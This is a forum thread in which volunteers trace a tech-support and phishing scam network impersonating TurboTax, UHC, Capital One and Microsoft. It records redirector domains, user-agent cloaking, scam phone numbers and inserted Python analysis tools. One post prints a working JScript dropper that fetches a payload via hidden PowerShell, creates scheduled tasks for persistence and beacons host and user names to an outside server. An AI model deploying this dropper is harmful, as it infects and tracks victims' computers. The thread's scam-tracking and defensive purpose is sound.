Web InfoTech, LLC/WeConnect Soft Solutions Pvt Ltd/Garage2Global Ventures Pvt Ltd

Now some news: the redirector has changed its target to https://activation.begin.rest/turbotax/

I reported this multi-scam website here:

suspecting that it was a Web InfoTech property. Now there is more evidence.

1 like

Another thing, kind of a puzzle:

A bunch of this scam group’s impersonation web sites share this “DG” logo as a favicon and/or elsewhere. It never seems related to the supposed topic of the website (Turbotax, HBO Max, Fidelity investments…)

What does DG stand for? Is it a clue?

1 like

Guess what? This same number is also the “support” number for the Microsoft mobile phone linking scheme

Phishing page https://akas.prinset.shop/

inevitably leads to the fake error page Phone Link

Associated tawk.to account https://tawk.to/chat/65182c27e6bed319d0048030/1hbj6oupp

These scammers are hungry – put your phone number in the form on the phishing page and Peter Mam or one of his fellow Support Executives will call you right away on a Saturday. I got a call from Peter Mam on 856-212-1306.

2 likes

I submitted the phishing page. Sunday.

2 likes

Here’s what I think is another piece of their Internet infrastructure.

Take for example this fake TurboTax page https://installtaxturbo.com/install-turbotax-with-license-code/

It links to the site Download & Install TurboTax® Desktop 2024-2025 which I’ve noted as a suspected Web Infotech property in a couple other threads, via a redirecting domain, “ww0.us.”

See Fake HP Printer scammer websites - #10 by ElmerFudde2020 for another example.

Now, for the redirection to work, an HTTP parameter has to be passed to ww0.us (after the “?” in the URL). The usual parameters I’ve seen seem to be base64-encoded URLs.

However, what about a sort of default or dummy parameter? Is there a default or fallback response?

What if we tried https://ww0.us/?I_AM_A_SCAMMER ?

Guess where it redirects to?

3 likes

More on ww0.us: Currently Whois records say the domain is administered by a “Roger Watts” at a very modest residential address in New Jersey (I’m not going to post the exact address because there’s a good chance it’s fake and whoever lives there has nothing to do with this).

Registered admin email [email protected] is also the admin for two obvious phishing domains, both registered in January of this year:

https://activateuhccom.us/ and https://activateuhc.us/ , both pretending to be United Healthcare, and both of which are probably more scammy than the real UHC which is hard to beat.

The link on the second address uses the ww0.us redirector/obfuscator!

aHR0cHM6Ly9hY3RpdmF0ZXVoYy51cw== is just the originating URL, https://activateuhc.us , in base64.

It redirects to, where else?, a subdirectory of activation.begin.support – setup your activate.uhc.com (it will return a dummy page unless you access it through the phishing redirector link).

And of course there’s an error, why not! setup your activate.uhc.com

New toll-free number: 855-222-8365. I get the standard “blacklisted” message that I get from Web Infotech numbers when I call from my main research phone.

But wait, there’s more. Up until December 26 of last year, ww0.us was owned by a Salman Khan of Rajasthan, email [email protected] (cool email address, Salman!). The other domain registered to that address is a very suspicious https://youtube.gs/

*Note: Salman Khan is the name of a famous Bollywood actor, probably not the same guy! And quite likely not even a real name for one of our scammers, just a little joke from them.

3 likes
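As an added example (not code from the thread or any of its posters), here is a small Python helper for the triage step the posts above describe by hand: taking a redirector link such as https://ww0.us/?aHR0cHM6Ly9hY3RpdmF0ZXVoYy51cw== and recovering the base64-encoded destination, while recognising a dummy parameter like ?I_AM_A_SCAMMER as "not an encoded URL" (whatever the redirector then does with it is its own fallback behaviour). The redirector domain and the two sample links are the ones quoted in the thread; the function names, the tolerance for missing padding, and the handling of key=value and percent-encoded variants are my assumptions about how other redirectors of this kind build their links.

```python
import base64
import binascii
from urllib.parse import urlsplit, unquote


def _base64_url(blob):
    """Return blob decoded as text if it is base64 of an http(s) URL, else None.

    Both the standard and the URL-safe alphabets are tried, and missing '='
    padding is tolerated (assumption: some redirector links strip it).
    """
    blob = blob.strip()
    if not blob:
        return None
    padded = blob + "=" * (-len(blob) % 4)
    decoders = (
        lambda b: base64.b64decode(b, validate=True),  # strict standard alphabet
        base64.urlsafe_b64decode,                      # '-' / '_' variant
    )
    for decode in decoders:
        try:
            text = decode(padded).decode("ascii")
        except (binascii.Error, ValueError):  # bad alphabet, padding, or non-ASCII bytes
            continue
        if text.startswith(("http://", "https://")):
            return text
    return None


def decode_redirect_param(url):
    """Recover the hidden destination from a redirector link.

    Handles the bare form seen in the thread (https://ww0.us/?<base64>) and,
    as an assumption about similar redirectors, key=value and percent-encoded
    variants. Returns (destination, kind) where kind is "base64-url" or
    "unknown"; a dummy parameter such as ?I_AM_A_SCAMMER yields (None, "unknown").
    """
    query = unquote(urlsplit(url).query)
    candidates = []
    for part in query.split("&"):
        key, sep, value = part.partition("=")
        if sep and value:
            candidates.append(value)   # value of a key=value pair
    candidates.append(query)           # bare blob placed directly after '?'
    for candidate in candidates:
        target = _base64_url(candidate)
        if target:
            return target, "base64-url"
    return None, "unknown"


if __name__ == "__main__":
    # The two links quoted in the thread: one real encoded target, one dummy parameter.
    for link in ("https://ww0.us/?aHR0cHM6Ly9hY3RpdmF0ZXVoYy51cw==",
                 "https://ww0.us/?I_AM_A_SCAMMER"):
        print(link, "->", decode_redirect_param(link))
```

Feeding a list of harvested links through decode_redirect_param gives the set of lure pages behind a redirector without visiting anything, which is also a safe way to spot links whose parameter is not an encoded URL at all.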

I think the link is changed now!

4 likes

New website: tx.newredir.com now redirects to Download & Install TurboTax® Desktop 2024-2025.

So over the course of the month this multi-scam website has moved from activation.begin.rest to activation.begin.support to activation.begin.lat.

5 likes

If your browser user-agent is set to Chrome on Android, tx.newredir.com once again redirects to https://ts.activatetax.pro/Installation-Error-Contact-Support.php . Probably works for some other browser user agent combos. New toll-free phone number: 855-531-2626.

3 likes

Via a Google search I found another subdirectory of this multi-scam site. This one doesn’t seem to check for referrer, user-agent or HTTP parameters.

2 likes

A new domain I discovered today

The Google Sites page Activate my Capital One card online at Activate.capitalone.com links to

If the browser user agent is a mobile phone variety, it redirects to

https://activation-support.tax-com.com/capitalone/enter-code.php

with the error page https://activation-support.tax-com.com/capitalone/authentication-error.php

New toll-free number: 866-593-3778.

Here’s a spam post that’s a catalogue of related phishing sites, including other subdomains of tax-com.com:

(copy archived at web.archive.org: installturbotax | Players list | Bandori Party - BanG Dream! Girls Band Party)

2 likes

And today this page has another new toll-free number: 855-613-0464.

2 likes

New toll-free number spotted today: 855-668-8507.

3 likes

New website and new phone number. The redirect yields the scamming page for Safari/iOS (but oddly, not Chrome/Android).

https://activation-support.tellmenew.com/capitalone/authentication-error.php

855-619-8688

3 likes
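Several posts above note that the redirect only fires for some browser user agents (Chrome on Android in one case, Safari/iOS but not Chrome/Android in another, a mobile phone variety for the Capital One lure). As an added example that is not part of the thread, the Python below probes a URL with a handful of user-agent profiles and records each redirect chain hop by hop instead of blindly following it, so the destinations can be compared side by side. To keep it runnable offline it includes a constructed local mock of a cloaking redirector (only "mobile" user agents get sent to the error page); the mock's behaviour, the user-agent strings, the page name and all function names are my assumptions, not measurements of any site in the thread.

```python
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urljoin

# Constructed stand-in for a cloaking redirector (assumption about how the gate
# works): phone browsers are bounced to a fake error page, everyone else sees a
# harmless placeholder, so a desktop check of the link looks clean.
class _MockCloakingHandler(BaseHTTPRequestHandler):
    ERROR_PAGE = "/Installation-Error-Contact-Support.php"

    def do_GET(self):
        ua = self.headers.get("User-Agent", "")
        if self.path == self.ERROR_PAGE:
            self._reply(200, b"Installation error! Call support")
        elif "Android" in ua or "iPhone" in ua:
            self.send_response(302)
            self.send_header("Location", self.ERROR_PAGE)
            self.send_header("Content-Length", "0")
            self.end_headers()
        else:
            self._reply(200, b"Nothing to see here")

    def _reply(self, status, body):
        self.send_response(status)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_mock_server():
    """Start the mock on a free loopback port; returns its base URL."""
    server = HTTPServer(("127.0.0.1", 0), _MockCloakingHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return "http://127.0.0.1:%d/" % server.server_address[1]


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # surface every 3xx as HTTPError instead of following it


def redirect_chain(url, user_agent, max_hops=8):
    """Follow redirects one hop at a time with the given User-Agent.

    Returns (urls_visited, final_status); final_status is None if max_hops is
    exceeded, which itself is a signal worth noting for multi-step redirectors.
    """
    opener = urllib.request.build_opener(_NoRedirect)
    chain = [url]
    for _ in range(max_hops):
        req = urllib.request.Request(chain[-1], headers={"User-Agent": user_agent})
        try:
            with opener.open(req, timeout=10) as resp:
                return chain, resp.status
        except urllib.error.HTTPError as err:
            location = err.headers.get("Location")
            if err.code in (301, 302, 303, 307, 308) and location:
                chain.append(urljoin(chain[-1], location))
                continue
            return chain, err.code
    return chain, None


# Constructed, representative user-agent strings (assumption: real ones are longer).
PROFILES = {
    "desktop-edge": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0 Safari/537.36 Edg/120.0",
    "android-chrome": "Mozilla/5.0 (Linux; Android 13; Pixel 7) AppleWebKit/537.36 Chrome/120.0 Mobile Safari/537.36",
    "ios-safari": "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 Version/17.0 Mobile/15E148 Safari/604.1",
}


def compare_user_agents(url, profiles=PROFILES):
    """Map each profile name to its (chain, status) for the given URL."""
    return {name: redirect_chain(url, ua) for name, ua in profiles.items()}


def cloaking_detected(results):
    """True when different user agents end up at different final URLs."""
    return len({chain[-1] for chain, _ in results.values()}) > 1


if __name__ == "__main__":
    base = start_mock_server()
    results = compare_user_agents(base)
    for name, (chain, status) in results.items():
        print("%-15s %s  (status %s)" % (name, " -> ".join(chain), status))
    print("cloaking detected:", cloaking_detected(results))
```

Recording the chain rather than just the final page matters here because the thread's sites sit behind two or three intermediate domains (ww0.us, tx.newredir.com, ts.remdos.com, taxredir.online); each hop is an indicator in its own right, and a hop count that keeps changing between visits is often the first sign that a new intermediate domain has been inserted.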

866-217-2243 is active again at https://myefiling.online//Installation-Error-Contact-Support.php .

Update later the same day: a new toll free number, 855-923-3385.

In other news, the old redirecting site tx.newredir.com seems to have finally gone down (for now?) and all their thousands of SEO spam feeder pages are being updated with a new intermediate domain, ts.remdos.com. E.g. Installturbotax.com. Registrar is AppCroNix Infotech Private Limited, d/b/a VEBONIX.com, registered just five days ago.

2 likes

Update on this: with my browser user agent set to MS Edge on Windows, activateuhc.us directs me via ww0.us to a new phishing domain, setup your activate.uhc.com. After entering my (fake) info, the form sends me to this page:

Which prompts me to download and install a zip-compressed EXE file and run it! Wow that can’t be good. Anyone want to do some analysis on the file?

The parent domain freetechsupport.org returns a bare-bones “tech support” website with a phone number: 856-240-0005.

Google says 856-240-0005 is also the number for:

1 like

So the “EXE” file is not actually a binary file but some kind of PowerShell thing that downloads from various URLs – still very malicious!

// Analysis notes (the // comments) added to the posted code; it is a Windows Script Host (JScript) dropper.
var shell = new ActiveXObject("WScript.Shell");
var fso = new ActiveXObject("Scripting.FileSystemObject");
var localAppData = shell.ExpandEnvironmentStrings("%LOCALAPPDATA%");
// Two batch files under the user's profile: update.bat is written now, backup.bat is fetched later by update.bat.
var updateBatPath = localAppData + "\\update.bat";
var backupBatPath = localAppData + "\\backup.bat";
var updateBatContent = "@echo off\n";
// update.bat starts a hidden PowerShell that downloads the next stage (served with a fake ".mp3" name) and saves it as backup.bat.
updateBatContent += "start /min cmd /c PowerShell.exe -WindowStyle Hidden -Command \"Invoke-WebRequest -Uri 'http://dr5.org/in.mp3' -OutFile '" + backupBatPath + "'\"\n";
var updateBatFile = fso.CreateTextFile(updateBatPath, true);
updateBatFile.Write(updateBatContent);
updateBatFile.Close();
// Persistence: a daily scheduled task running as the current user; "echo N |" answers any prompt, /F forces overwrite, the trailing 0 hides the window.
function createScheduledTask(taskName, taskTime, taskPath) {
    var command = 'SCHTASKS /Create /SC DAILY /TN "' + taskName + '" /TR "' + taskPath + '" /ST ' + taskTime + ' /RU "' + shell.ExpandEnvironmentStrings("%USERNAME%") + '" /F';
    shell.Run("cmd /c echo N | " + command, 0, true);
}
// Four daily tasks in a "MyTasks" folder: at 11:05 and 19:05 update.bat re-downloads backup.bat, and one minute later backup.bat runs it.
createScheduledTask("MyTasks\\1", "11:05", '"' + updateBatPath + '"');
createScheduledTask("MyTasks\\2", "11:06", '"' + backupBatPath + '"');
createScheduledTask("MyTasks\\3", "19:05", '"' + updateBatPath + '"');
createScheduledTask("MyTasks\\4", "19:06", '"' + backupBatPath + '"');
// Beacon: opens a URL tagged "uhc" (the lure that worked) carrying the computer and user names.
var computerName = shell.ExpandEnvironmentStrings("%COMPUTERNAME%");
var userName = shell.ExpandEnvironmentStrings("%USERNAME%");
var url = "http://l77.org/downloading.php?dl=uhc&id=" + computerName + "_" + userName;
shell.Run("cmd /c start /min " + url, 0, false);

1 like
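The dropper above persists through SCHTASKS: four daily tasks in a "MyTasks" folder, each pointing at a .bat file in %LOCALAPPDATA%, with the downloader and the downloaded script scheduled one minute apart. As an added example that is not part of the thread, the Python below turns that into a host check: it reads the CSV produced by `schtasks /query /fo CSV /v` and flags tasks whose action is a script in a user-writable directory or a hidden PowerShell command. The sample CSV is constructed (a column subset shaped after the dropper's tasks plus two benign look-alikes); the column names "TaskName", "Task To Run", "Run As User" and "Start Time" are my recollection of the verbose output, so check them against your own export, and the second-stage URL in the sample is a placeholder, not the one from the post.

```python
import csv
import io
import re

# Constructed sample in the shape of `schtasks /query /fo CSV /v` (column subset;
# the real verbose output has many more columns, and the parser keys by header
# name so extra columns are ignored). Rows 1-3 mirror what the dropper posted
# above would leave behind; rows 4-5 are benign look-alikes that must not fire.
SAMPLE_SCHTASKS_CSV = r'''
"HostName","TaskName","Status","Author","Task To Run","Run As User","Schedule Type","Start Time"
"WS01","\MyTasks\1","Ready","WS01\victim","""C:\Users\victim\AppData\Local\update.bat""","victim","Daily","11:05:00"
"WS01","\MyTasks\2","Ready","WS01\victim","""C:\Users\victim\AppData\Local\backup.bat""","victim","Daily","11:06:00"
"WS01","\MyTasks\3","Ready","WS01\victim","PowerShell.exe -WindowStyle Hidden -Command ""Invoke-WebRequest -Uri http://stage2.example.invalid/in.mp3 -OutFile C:\Users\victim\AppData\Local\backup.bat""","victim","Daily","19:05:00"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","Ready","Microsoft Corporation","%windir%\system32\defrag.exe -c","SYSTEM","Weekly","01:00:00"
"WS01","\Vendor\Updater","Ready","WS01\victim","""C:\Users\victim\AppData\Local\Vendor\updater.exe"" /silent","victim","Daily","09:00:00"
'''

SCRIPT_EXTENSIONS = (".bat", ".cmd", ".vbs", ".vbe", ".js", ".jse", ".wsf", ".ps1", ".hta")
# Locations a standard user can write to; a scheduled task whose program lives
# here is not necessarily bad (see the updater row) but a *script* there is.
USER_WRITABLE = re.compile(
    r"\\AppData\\(Local|Roaming)\\|\\Temp\\|\\Downloads\\|\\Public\\|%(LOCALAPPDATA|APPDATA|TEMP|TMP)%",
    re.IGNORECASE)
HIDDEN_POWERSHELL = re.compile(r"powershell(\.exe)?.*-w(indowstyle)?\s+hidden", re.IGNORECASE)


def first_token(action):
    """Return the program part of a 'Task To Run' value (quoted path or first word)."""
    action = action.strip()
    if action.startswith('"'):
        end = action.find('"', 1)
        return action[1:end] if end > 0 else action[1:]
    return action.split(maxsplit=1)[0] if action else ""


def scan_schtasks_csv(csv_text):
    """Flag tasks whose action is a script in a user-writable directory or a
    hidden PowerShell command. Returns a list of finding dicts in file order."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text.strip())):
        name = row.get("TaskName", "")
        if name == "TaskName":  # guard in case the export repeats its header row
            continue
        action = (row.get("Task To Run") or "").strip()
        program = first_token(action)
        reasons = []
        if program.lower().endswith(SCRIPT_EXTENSIONS) and USER_WRITABLE.search(program):
            reasons.append("script file in user-writable directory")
        if HIDDEN_POWERSHELL.search(action):
            reasons.append("hidden PowerShell window")
        if reasons:
            findings.append({
                "task": name,
                "run_as": row.get("Run As User"),
                "start": row.get("Start Time"),
                "action": action,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_schtasks_csv(SAMPLE_SCHTASKS_CSV):
        print("%-20s %-8s %s  [%s]" % (finding["task"], finding["start"],
                                        finding["action"], "; ".join(finding["reasons"])))
```

On a real machine, export with `schtasks /query /fo CSV /v > tasks.csv` and pass the file's text to scan_schtasks_csv; the findings are a starting point for triage, and paired hits in the same folder a minute apart (downloader, then the downloaded script) are exactly the pattern the dropper above creates.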

So, if you query this URL using a Windows PowerShell user-agent string, you get something that isn’t an MP3 file (maybe the extension is to deceive firewalls or antivirus heuristics?) but a Windows shell script. I’m not good at analyzing this but it involves scheduling a bunch of recurring background tasks, and something named Antivirus-Update.bat. Any experts out there who can help decoding this?

I’m trying to paste the code into this comment but I’m getting a “403 error,” maybe it’s too long or something?

Update: I put the file through hybrid-analysis.com and it says it’s the “Trojan.Script.Agent.khixek” aka the AdsExhaust trojan, which supposedly generates fake clicks on pay-per-click ads or something like that?

1 like

ts.remdos.com is still going, but a new intermediate redirector domain has been added to the multiple-step path of redirection: taxredir.online, registered on 19 March 2025.

And a new toll-free fake Turbotax number: 855-984-0698.

Update 5 April 2025: New toll-free fake TurboTax: 855-984-0972.

3 likes

Vonage number (786) 946-2540

1 like